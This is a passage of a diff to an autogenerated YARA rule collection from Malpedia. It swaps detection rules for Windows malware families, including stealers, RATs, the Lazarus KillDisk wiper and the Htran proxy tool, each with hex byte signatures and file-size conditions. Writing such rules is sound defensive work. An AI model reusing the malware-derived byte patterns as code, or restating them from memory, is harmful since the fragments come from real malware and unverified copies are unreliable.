+		$sequence_6 = { ffd6 c645f863 bf00020000 807dfe28 0f838f000000 33db 57 }
+		$sequence_7 = { 8b7d00 8bf0 8bc1 c1e902 f3a5 8bc8 33c0 }
+		$sequence_8 = { 6a00 89450c 8d450c 50 ff75f8 53 }
+		$sequence_9 = { 83c414 85c0 7508 0fb745fc 85c0 7403 }
+		$sequence_10 = { 8d9e18020000 8d54240c 52 8d542418 }
+		$sequence_11 = { 53 56 57 8965e8 33db 895dc0 b907000000 }
+		$sequence_12 = { 7517 8b842418010000 8938 5f 5e 33c0 }
+		$sequence_13 = { 66894dc8 b906000000 33c0 8d7da8 f3ab c745a808000000 }
+		$sequence_14 = { c745bc00000000 8d4dec e8???????? 8d4dd8 e8???????? }
+		$sequence_15 = { ff33 ff15???????? 832300 59 8b45fc 5f 5e }
 
 	condition:
-		7 of them and filesize < 98304
+		7 of them and filesize < 368640
 }
-rule MALPEDIA_Win_Ryuk_Stealer_Auto : FILE
+rule MALPEDIA_Win_Purplefox_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "28c4a97d-0c23-5f05-a50b-7fc331a8ef51"
+		id = "e0153672-5fee-5a98-93dd-cdb37613f00c"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ryuk_stealer"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ryuk_stealer_auto.yar#L1-L114"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.purplefox"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.purplefox_auto.yar#L1-L389"
 		license_url = "N/A"
-		logic_hash = "f104c51f76af6a34fecb95d90a97bc0fef4b38e853341fac8b68ac59b1274295"
+		logic_hash = "bc347e2a2c2675d6f613a457b6f24810b2ee549a3110e9ad4ab849ea2adb4170"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -87793,32 +87933,62 @@ rule MALPEDIA_Win_Ryuk_Stealer_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff15???????? 8bf0 ff15???????? 85c0 7518 85f6 7414 }
-		$sequence_1 = { 8bcb 0f44f2 42 8d7902 }
-		$sequence_2 = { 83ff01 755d 8bcb e8???????? }
-		$sequence_3 = { f7f9 81c2a8610000 52 ff15???????? }
-		$sequence_4 = { 99 b9a0860100 f7f9 81c2a8610000 52 }
-		$sequence_5 = { f7f1 8bf2 e8???????? 8bc8 33d2 8bc6 f7f1 }
-		$sequence_6 = { c1e902 f3a5 8bca 83e103 f3a4 6a64 8d44245c }
-		$sequence_7 = { 8a443701 3c2f 7408 3c2d }
-		$sequence_8 = { ff15???????? 83f805 740a b9???????? }
-		$sequence_9 = { 8d45e0 50 8d85b4fdffff 50 }
+		$sequence_0 = { 33c0 48898500040000 8bd8 4c899df8030000 90 }
+		$sequence_1 = { 64bba3ae1c94 af 6c 7924 5e 52 }
+		$sequence_2 = { 488d05fc900000 488b4c2430 483bc8 7405 e8???????? 488b05???????? }
+		$sequence_3 = { 8b0a 6a00 51 6800000100 50 ff15???????? 8bf0 }
+		$sequence_4 = { 4c8b642450 0f84c5000000 488364242000 488d05e17f0000 c64424600d 4a8b0ce0 }
+		$sequence_5 = { e8???????? e9???????? 8b570c 8b4708 }
+		$sequence_6 = { 750a b80d0000c0 e9???????? 488d7768 }
+		$sequence_7 = { 0f88c9000000 488b4c2460 ff15???????? 4839442470 0f85b3000000 488d542460 488bce }
+		$sequence_8 = { 488d4c2420 e8???????? eb1e 488b5710 488d0d21b10000 e8???????? 488b5710 }
+		$sequence_9 = { 85c0 0f88c7010000 4c8b05???????? 488b8d08040000 488d442470 }
+		$sequence_10 = { d565 96 dcb2503c62fc b23e ac 82d0e0 e460 }
+		$sequence_11 = { 55 8bec 33c0 8b4d08 3b0cc528bb4000 740a 40 }
+		$sequence_12 = { e8???????? 488b5710 488d4c2420 e8???????? }
+		$sequence_13 = { 56 6a1b 52 ffd7 85c0 7918 6a00 }
+		$sequence_14 = { 8bd8 85c0 0f8882000000 c744246800010000 4889742460 89742458 }
+		$sequence_15 = { 6a00 6a00 68000000c0 68???????? ff15???????? 8985e0fdffff }
+		$sequence_16 = { ff75e0 ff15???????? c9 c20800 6a00 6800100000 }
+		$sequence_17 = { 488d0d1b0f0000 ff15???????? 8bc7 eb02 33c0 }
+		$sequence_18 = { 348a 90 be7c1a1278 04b2 7a00 bc0ad47a56 }
+		$sequence_19 = { 9c f5 83c506 66892424 }
+		$sequence_20 = { 488bc8 ff15???????? 488d1528460000 488bce 488905???????? ff15???????? 488bc8 }
+		$sequence_21 = { 57 56 6a0b ffd3 3d040000c0 750d }
+		$sequence_22 = { 8945d0 8945d4 8945dc c745d880000000 }
+		$sequence_23 = { e9???????? 0fa3c3 8d861cae46c3 66b8f230 8b4500 }
+		$sequence_24 = { 488d0d55100000 ff15???????? 488b6c2450 8bc3 488b5c2468 }
+		$sequence_25 = { ff15???????? 8bc3 4881c4d0000000 5e 5b 5d c3 }
+		$sequence_26 = { 8d45ec e8???????? 33c0 0175dc 6800040000 }
+		$sequence_27 = { 83e61f 8d3c85000c4100 8b07 c1e606 f644300401 }
+		$sequence_28 = { 7681 f1 6c 3c9f 7d8b 017b29 }
+		$sequence_29 = { 8d95defdffff 33c9 52 8945f8 8945f4 8945f0 }
+		$sequence_30 = { 488d3d4c610000 eb0e 488b03 4885c0 7402 }
+		$sequence_31 = { 0483 bd1d8f909a 30a563491b40 5e a0???????? 4b }
+		$sequence_32 = { 6800020000 50 ff15???????? 85c0 790a 8b4df8 ffd3 }
+		$sequence_33 = { 8978f0 8b4df8 8948f4 c740e001000000 c740e40d000000 }
+		$sequence_34 = { 89df 2cfd 60 60 c0e002 b02e f9 }
+		$sequence_35 = { 51 50 e8???????? 85c0 7417 c70701000000 8b07 }
+		$sequence_36 = { 81fe00000001 7708 81c600100000 eb9b 8d4dc4 51 ff15???????? }
+		$sequence_37 = { 56 e8???????? 8bc6 c1f805 8b0485000c4100 83e61f c1e606 }
+		$sequence_38 = { 488d1578900000 483950f0 740b 488b10 4885d2 7403 }
+		$sequence_39 = { 48895c2418 55 56 57 4883ec30 488d3da9b40000 33ed }
 
 	condition:
-		7 of them and filesize < 368640
+		7 of them and filesize < 1983488
 }
-rule MALPEDIA_Win_Kimjongrat_Auto : FILE
+rule MALPEDIA_Win_Lazarus_Killdisk_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "6fc69770-2665-5839-9d6a-97fd73d156df"
+		id = "0195fc4c-73fa-5c09-bf2a-89a4d303bb67"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kimjongrat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.kimjongrat_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lazarus_killdisk"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.lazarus_killdisk_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "edaec54e18eb1d3289f1a7f5442afe5f1403cb37fea612fda6550402130dfa44"
+		logic_hash = "b26134f5ee9a86ea9f8f0c2251fd193e47e701ab49921be548b684d8807f003c"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -87832,32 +88002,32 @@ rule MALPEDIA_Win_Kimjongrat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff7510 56 e8???????? 83c408 eb30 57 e8???????? }
-		$sequence_1 = { 751c 8b45f4 83c004 8945f4 8b00 43 83c704 }
-		$sequence_2 = { eb02 33db ff7610 57 e8???????? 83c408 85c0 }
-		$sequence_3 = { c7856cffffffffffffff 8b4510 80380c 7513 8b4dd4 ff31 ff7008 }
-		$sequence_4 = { eb30 c6840d64d9ffff5e eb26 c6840d64d9ffff2f eb1c c6840d64d9ffff3f eb12 }
-		$sequence_5 = { e8???????? 53 57 e8???????? 8b5304 0fbf5b26 83c414 }
-		$sequence_6 = { eb13 8b4d20 0fb6c1 85c9 bb20000000 0f45d8 80cb01 }
-		$sequence_7 = { c7852cffffff00000000 741e 8d8504ffffff 68???????? 50 e8???????? 83c408 }
-		$sequence_8 = { e8???????? 83c410 5d c3 6a00 b8???????? 6aff }
-		$sequence_9 = { e8???????? 668b4608 663345c4 b9007e0000 6623c1 83c40c 663145c4 }
+		$sequence_0 = { 8d95f8feffff 52 e8???????? 8b4dfc ff0d???????? 33cd 83c410 }
+		$sequence_1 = { 6800040000 68???????? 56 ffd7 4b 75ea }
+		$sequence_2 = { 56 57 e8???????? 8b1d???????? 33ff 6803010000 }
+		$sequence_3 = { 83d2ff 56 8945ec 8955f0 ff15???????? }
+		$sequence_4 = { ffd7 46 fe442410 d1eb 759b }
+		$sequence_5 = { e8???????? 8d842468010000 83c410 8d5001 }
+		$sequence_6 = { 8d75a6 8b06 8b4e08 8b560c 8945e8 8b4604 8945ec }
+		$sequence_7 = { 57 ff15???????? 46 83fe20 7cc0 }
+		$sequence_8 = { 57 8945f0 89b5e4fdffff ffd3 3b45f0 }
+		$sequence_9 = { 8945fc 53 56 57 6824010000 8d85c4feffff 6a00 }
 
 	condition:
-		7 of them and filesize < 1572864
+		7 of them and filesize < 209920
 }
-rule MALPEDIA_Win_Betabot_Auto : FILE
+rule MALPEDIA_Win_Sphijacker_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "76d74828-4d3c-5b24-a19d-5dd4164ed17c"
+		id = "209b4753-8fba-5f0f-8267-5050665ba5bc"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.betabot"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.betabot_auto.yar#L1-L130"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sphijacker"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.sphijacker_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "07dd0ba00e2d3513e1cad1cf2b7d11e94e25b4a1985b335a6dca6b1199e5355b"
+		logic_hash = "a99b1a8ce4f2ca018676a9e46f28df0afb5f7a80b3caa10c6423eb9f11e6c670"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -87871,32 +88041,32 @@ rule MALPEDIA_Win_Betabot_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff15???????? ff15???????? 89859cfcffff 83a594fcffff00 eb0d 8b8594fcffff 40 }
-		$sequence_1 = { 663901 7408 6a02 58 e9???????? a1???????? 3bc3 }
-		$sequence_2 = { 7507 32c0 e9???????? 0591f4ffff 50 56 ff15???????? }
-		$sequence_3 = { 84d2 7905 884613 eb08 f6c240 7403 }
-		$sequence_4 = { 8d85c0fcffff 50 8d85f8feffff 50 8d85d0fdffff 50 8b85a4fcffff }
-		$sequence_5 = { 8bec 81ec44020000 f605????????80 7405 33c0 }
-		$sequence_6 = { 894610 895e14 898e18010000 85c0 7426 3dffff0000 731f }
-		$sequence_7 = { a1???????? f6401280 7405 6a02 58 c9 c3 }
-		$sequence_8 = { 50 57 e8???????? 56 8d45f0 50 ff7510 }
-		$sequence_9 = { e8???????? eb12 a1???????? 85c0 740b 8d4dfc }
+		$sequence_0 = { 488bc3 4c8d3586ae0100 83e03f 488bf3 48c1ee06 488d3cc0 }
+		$sequence_1 = { ffc8 8bf8 0fb68c8282d80100 0fb6b48283d80100 33d2 488d1c8d00000000 }
+		$sequence_2 = { 4889442420 488d1527e00100 48c7c102000080 ff15???????? 488b4d18 4c8d4520 488d15fbe00100 }
+		$sequence_3 = { 740e 8bd0 488d0dd2e20100 e8???????? 488b442450 }
+		$sequence_4 = { 488bc3 b9209f0000 6666660f1f840000000000 8030ee 488d4005 4883e901 }
+		$sequence_5 = { 4c8bc3 488d8d34030000 898530030000 e8???????? 488d0d95ecfeff 48c1e602 0fb784b980d80100 }
+		$sequence_6 = { 41b93f000f00 4533c0 4889442420 488d154ddf0100 48c7c102000080 ff15???????? 488b4d18 }
+		$sequence_7 = { 488bce 0f1f4000 0f1f840000000000 0fb7440c6c 6639840d501c0000 }
+		$sequence_8 = { 4889742410 57 4c8bd2 488d359bd1feff }
+		$sequence_9 = { 660feb15???????? 660feb0d???????? 4c8d0dd4ac0000 f20f5cca f2410f590cc1 660f28d1 660f28c1 }
 
 	condition:
-		7 of them and filesize < 835584
+		7 of them and filesize < 808960
 }
-rule MALPEDIA_Win_Webc2_Ugx_Auto : FILE
+rule MALPEDIA_Win_Ployx_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "1c23cedb-b71d-5193-aa31-e8153ab4c4b4"
+		id = "88ff8b0e-42c8-531a-aa7c-e4d988bc3583"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_ugx"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.webc2_ugx_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ployx"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ployx_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "7d4c482dc506453890fdde88d716a3ceb2e3f8b35a1cb1eec11dbba57393fe56"
+		logic_hash = "6c51c47290988f53993f59d945fc1bce237ebb223534fe936a15d347d9e6950c"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -87910,32 +88080,32 @@ rule MALPEDIA_Win_Webc2_Ugx_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff969c060000 3bc3 89458c 0f8497030000 }
-		$sequence_1 = { 57 ff969c060000 3bc3 8945d8 0f8487020000 }
-		$sequence_2 = { 50 ff7508 ff969c060000 3bc3 8945bc 0f84a2040000 8b7db4 }
-		$sequence_3 = { ff55c0 57 ff55f8 ff55e8 }
-		$sequence_4 = { 50 e8???????? 6a01 6a10 57 68420d0000 }
-		$sequence_5 = { aa 33c0 8d7d9d 885d9c c645d47a ab ab }
-		$sequence_6 = { 8d8b00200000 894db4 8d9100200000 8955b8 8db200200000 8975dc 81c600100000 }
-		$sequence_7 = { ff55b8 85c0 741c 8d8584fdffff 50 }
-		$sequence_8 = { f3ab 66ab aa 33c0 8d7de9 885de8 8b7508 }
-		$sequence_9 = { e9???????? 8d86ae090000 50 57 ff969c060000 3bc3 8945c0 }
+		$sequence_0 = { 5d 5b c3 56 68???????? 6804010000 ff15???????? }
+		$sequence_1 = { e8???????? 8b35???????? 59 59 8d45fc 50 ffd6 }
+		$sequence_2 = { ff7610 e8???????? 8bf8 8d4701 50 e8???????? 56 }
+		$sequence_3 = { e8???????? 8b0d???????? 56 ff75f0 c1e105 50 89840da8d5ffff }
+		$sequence_4 = { 56 57 6a03 8b5d08 99 5e 33c9 }
+		$sequence_5 = { 720a c1e818 0500040000 eb0a c1e810 25003f0000 0bc7 }
+		$sequence_6 = { e8???????? a1???????? c1e005 8b8405a8d5ffff 80243000 a1???????? }
+		$sequence_7 = { ff15???????? 6aff ff35???????? ff15???????? a1???????? 3bc6 5e }
+		$sequence_8 = { 8b35???????? 83c434 8d85a4fdffff 50 ffd6 8d45dc }
+		$sequence_9 = { 5b c3 56 68???????? 6804010000 ff15???????? 33f6 }
 
 	condition:
-		7 of them and filesize < 57344
+		7 of them and filesize < 229376
 }
-rule MALPEDIA_Win_Stinger_Auto : FILE
+rule MALPEDIA_Win_Cmstar_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "03e2d1ca-b846-5787-b683-28feb74dae3e"
+		id = "573d55cd-4176-58c6-b881-46544636e3cc"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.stinger"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.stinger_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cmstar"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.cmstar_auto.yar#L1-L170"
 		license_url = "N/A"
-		logic_hash = "64d2d0bb18e9f4889ac80d1e49c5ab473a950fa26645e6f561f71db4e8eb08f3"
+		logic_hash = "a019849b15c13075d7ee37f6ab493df0eaba09a0dd6bc46a1e79b4c730b7a0f1"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -87949,32 +88119,38 @@ rule MALPEDIA_Win_Stinger_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8bec 81ec10000000 6804000080 6a00 8b5d08 }
-		$sequence_1 = { f6c441 0f854d010000 8b45f4 50 8b5d08 ff33 }
-		$sequence_2 = { 895df8 8965f4 ff75fc ff15???????? 90 90 }
-		$sequence_3 = { 6806000000 e8???????? 83c404 e9???????? 8be5 5d c21000 }
-		$sequence_4 = { e9???????? 68???????? 8b5d0c ff33 e8???????? 83c408 }
-		$sequence_5 = { a1???????? 85c0 891c85ecbe4000 750a }
-		$sequence_6 = { 6806000000 e8???????? 83c404 a3???????? 8965f8 68???????? }
-		$sequence_7 = { ff75fc 6802000000 bb94020000 e8???????? 83c41c 8945e8 }
-		$sequence_8 = { 6800000000 6800000000 68???????? ff35???????? 6800000000 ff15???????? 90 }
-		$sequence_9 = { 8b5d08 ff33 b902000000 e8???????? 83c408 8945f0 ff750c }
+		$sequence_0 = { 56 bb04010000 57 53 }
+		$sequence_1 = { 836dfc10 ff75fc 8945e0 8b45dc 83c310 }
+		$sequence_2 = { 8bc6 e9???????? 6a10 8d45d0 53 }
+		$sequence_3 = { ff15???????? 6a03 58 5f 5e 5b c9 }
+		$sequence_4 = { ff15???????? 6a04 e8???????? be00040000 }
+		$sequence_5 = { 7504 6a03 eb0d 803b4d }
+		$sequence_6 = { 8b4dec c1e802 6a04 52 8d0481 50 }
+		$sequence_7 = { ff75e0 ff30 e8???????? 8b4df8 }
+		$sequence_8 = { bf???????? 8882a8430010 83c9ff 33c0 42 f2ae f7d1 }
+		$sequence_9 = { 85f6 889183420010 8b15???????? 7506 8b35???????? bf???????? 83c9ff }
+		$sequence_10 = { 889c2418050000 f3ab 66ab aa }
+		$sequence_11 = { 8a4601 46 84c0 75e1 83c9ff 33c0 f2ae }
+		$sequence_12 = { 7422 3cff 741e fec8 8841ff }
+		$sequence_13 = { 64890d00000000 81c4c0120000 c3 8b8c24d0120000 33db 3bcb 741c }
+		$sequence_14 = { ffd5 68???????? 53 ffd5 8bd0 83c9ff }
+		$sequence_15 = { f7d1 49 741e 8a441420 bf???????? 8882a8430010 }
 
 	condition:
-		7 of them and filesize < 197096
+		7 of them and filesize < 4268032
 }
-rule MALPEDIA_Win_Socelars_Auto : FILE
+rule MALPEDIA_Win_Sappycache_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "392a881e-8204-5538-905a-79f8339a81a4"
+		id = "5cde3466-1a40-5c62-84c0-18f8fb0eb5bd"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.socelars"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.socelars_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sappycache"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.sappycache_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "b8094e8a90fbd4b228aeee4fe07a815ac53358ef07b587d100a6e2f0f5e01dbf"
+		logic_hash = "accd6826861cb14b3264b0a3eac9debd4934e0de6f313d816d6bcd533efab795"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -87988,32 +88164,32 @@ rule MALPEDIA_Win_Socelars_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { f20f11542460 81ff5e010000 7e32 8a4c2415 8dbc24d0000000 33c0 888c24d0000000 }
-		$sequence_1 = { 8bec 56 8b7508 8b4608 85c0 7410 fe8850814f00 }
-		$sequence_2 = { f7d1 0b4db0 334dac ba04000000 6bc20d 034c05bc 8b55b4 }
-		$sequence_3 = { 8b4508 40 8939 ff463c 894638 8b5324 8b09 }
-		$sequence_4 = { e8???????? 807f4900 0f8583030000 837e5c00 750a 837e4c00 0f8473030000 }
-		$sequence_5 = { eb09 83f9ff 0f84eb040000 8b4e08 8b460c 234f20 234724 }
-		$sequence_6 = { eb05 e8???????? 8bf0 83c408 85f6 740d ff7508 }
-		$sequence_7 = { e8???????? 8945a8 8b45e8 50 8b4de0 e8???????? 8945a4 }
-		$sequence_8 = { e8???????? c645fc02 c685fbf8ffff00 68???????? 68???????? e8???????? 83c408 }
-		$sequence_9 = { 8bcb e8???????? 8bf0 83fe11 0f85cf000000 8b7c241c e9???????? }
+		$sequence_0 = { 48c1e109 4903cc e8???????? 488b5c2448 83f801 754c 8b542440 }
+		$sequence_1 = { 736c 488bf3 4c8bf3 49c1fe06 4c8d2d36da0000 }
+		$sequence_2 = { 8bea 0f1f8000000000 e8???????? 448bf0 }
+		$sequence_3 = { 4933d0 4a8794f150800100 eb2d 4c8b05???????? ebb1 }
+		$sequence_4 = { 0f84d1fcffff 418bfd 44896d80 498bdd 0f1f440000 33d2 488d8d20420000 }
+		$sequence_5 = { 488d1541900000 e8???????? 488bd8 4885c0 740f }
+		$sequence_6 = { 488bcf ff15???????? b801000000 488b6c2440 488b742448 488b7c2450 488b4c2428 }
+		$sequence_7 = { e8???????? 85c0 7407 b902000000 cd29 488d0d434b0100 }
+		$sequence_8 = { 3b15???????? 7350 488bca 4c8d05f9ca0000 83e13f 488bc2 48c1f806 }
+		$sequence_9 = { 488d05133c0100 ffcb 488d0c9b 488d0cc8 ff15???????? ff0d???????? 85db }
 
 	condition:
-		7 of them and filesize < 2151424
+		7 of them and filesize < 262144
 }
-rule MALPEDIA_Win_Crypto_Fortress_Auto : FILE
+rule MALPEDIA_Win_Strelastealer_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b81b861a-e59d-5e35-89f8-b48e5d1e64a8"
+		id = "9f02f870-18a6-5958-8b48-817eb9eee346"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.crypto_fortress"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.crypto_fortress_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.strelastealer"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.strelastealer_auto.yar#L1-L179"
 		license_url = "N/A"
-		logic_hash = "7ca8cfbcda8442ad971ad2acb852f7382cff13447a653716ebcb2d4ba6db0aed"
+		logic_hash = "90e62167509dc36976a411c59d204669c9f40c335a7d35fe2d5657e279efa4d6"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -88027,32 +88203,38 @@ rule MALPEDIA_Win_Crypto_Fortress_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 341b aa 2c03 aa 2cf9 aa 2c00 }
-		$sequence_1 = { 0433 aa 04fc aa 3411 }
-		$sequence_2 = { e8???????? 8bd8 68???????? e8???????? 50 53 }
-		$sequence_3 = { 8d3dccec4000 33c0 0450 aa }
-		$sequence_4 = { 33c0 0442 aa 2ce1 }
-		$sequence_5 = { 83c308 8345fc08 c78548ffffff9c000000 8d8548ffffff 50 e8???????? }
-		$sequence_6 = { 8345fc04 e8???????? 8803 83c301 8345fc01 8b45fc 5b }
-		$sequence_7 = { a3???????? 68???????? ff35???????? e8???????? 85c0 0f84a9030000 }
-		$sequence_8 = { 3dffff0000 0f84040e0000 a3???????? e8???????? }
-		$sequence_9 = { 68???????? ff35???????? e8???????? 85c0 0f842b010000 a3???????? }
+		$sequence_0 = { 4053 4883ec20 488d058bf80000 488bda 4a8b04c0 483902 7416 }
+		$sequence_1 = { 51 8d94246c010000 52 8d842478020000 }
+		$sequence_2 = { e9???????? e8???????? 488d1d8a4f0100 41b804010000 488bd3 33c9 }
+		$sequence_3 = { 6a0d 8bf8 e8???????? 8b0d???????? 8bf0 890e 8b15???????? }
+		$sequence_4 = { 4883c118 41b801010000 e8???????? 33d2 488d7b0c 0fb7c2 4c8d0d56150100 }
+		$sequence_5 = { 8bf0 57 4e ffd3 33c9 }
+		$sequence_6 = { 488b6c2438 488bc3 488b5c2430 488b742448 4883c420 5f }
+		$sequence_7 = { ffd5 85c0 7566 8b4c2428 89442440 89442444 89442434 }
+		$sequence_8 = { 4889442438 4c8d4c2470 488d8500060000 c785400a000000040000 4889442430 4c8d45a0 488d4588 }
+		$sequence_9 = { 8b0a e8???????? 90 488d1da24f0100 }
+		$sequence_10 = { 8d842470030000 50 8d8c247c040000 51 8d942470020000 52 68???????? }
+		$sequence_11 = { 68???????? ff15???????? 6a0d 8bf8 }
+		$sequence_12 = { 4c8b5577 488d05e1dc0000 0f1000 4c8bd9 488d4c2430 0f104810 0f1101 }
+		$sequence_13 = { ff15???????? ff15???????? 3db7000000 740a e8???????? }
+		$sequence_14 = { 85c0 0f842f020000 6804010000 8d8c247c030000 6a00 51 e8???????? }
+		$sequence_15 = { 33d2 488d8de0030000 41b804010000 e8???????? 33d2 488d8dc0010000 41b804010000 }
 
 	condition:
-		7 of them and filesize < 188416
+		7 of them and filesize < 266240
 }
-rule MALPEDIA_Win_Artfulpie_Auto : FILE
+rule MALPEDIA_Win_Htran_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "196adf33-8b22-5c74-a62b-042eb2b3d59f"
+		id = "791ab88f-729e-59ed-af49-9775d8f95bf2"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.artfulpie"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.artfulpie_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.htran"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.htran_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "bdd4f2999d6ecf7d7a96f23629ce24760f5dc31c13fa4dc261ca04838f018c57"
+		logic_hash = "644467af100df6d78907af875b29f835634dff017ff5ecb28fa828ec75819c6e"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -88066,32 +88248,32 @@ rule MALPEDIA_Win_Artfulpie_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c1f906 53 6bd830 56 8b048d984e4100 57 8b7d10 }
-		$sequence_1 = { 33ff 3b7e0c 7d32 8b4608 }
-		$sequence_2 = { 03f1 53 8b413c 03c7 8b7dfc }
-		$sequence_3 = { b8b42b0000 e8???????? 0f2805???????? 8bc2 0f118558ffffff 56 }
-		$sequence_4 = { 89861c020000 8b45e0 8d4e0c 6a06 8d9004424100 5f 668b02 }
-		$sequence_5 = { e8???????? 83a6984e410000 59 83c604 81fe00020000 72dd b001 }
-		$sequence_6 = { 8b4028 03c1 51 ffd0 837e0800 7444 }
-		$sequence_7 = { 5d c3 ff7728 8b4724 56 ffd0 }
-		$sequence_8 = { 83c102 03c1 50 8b4720 }
-		$sequence_9 = { 33c9 8bc1 3914c598294100 7408 }
+		$sequence_0 = { 6a00 2bd5 8d8424f0520000 52 50 }
+		$sequence_1 = { 3b1d???????? 0f8315010000 8bc3 8bcb c1f805 83e11f 8b048500c54000 }
+		$sequence_2 = { 8d3449 8d34b5f09b4000 83c00c 3bc6 7304 }
+		$sequence_3 = { 8dbc24eca20000 c1e902 f3a5 8bc8 33c0 }
+		$sequence_4 = { 6a01 58 c20400 8b542404 }
+		$sequence_5 = { 85ff 7faf e9???????? 85ed 0f8e74feffff 85f6 0f8e6cfeffff }
+		$sequence_6 = { 8816 46 eb0f 0fb6d2 f682c1c3400004 }
+		$sequence_7 = { e9???????? 68???????? e8???????? 8b942430510000 55 52 }
+		$sequence_8 = { 33c0 8dbc24ec520000 f3ab 8d9424e4000000 52 53 }
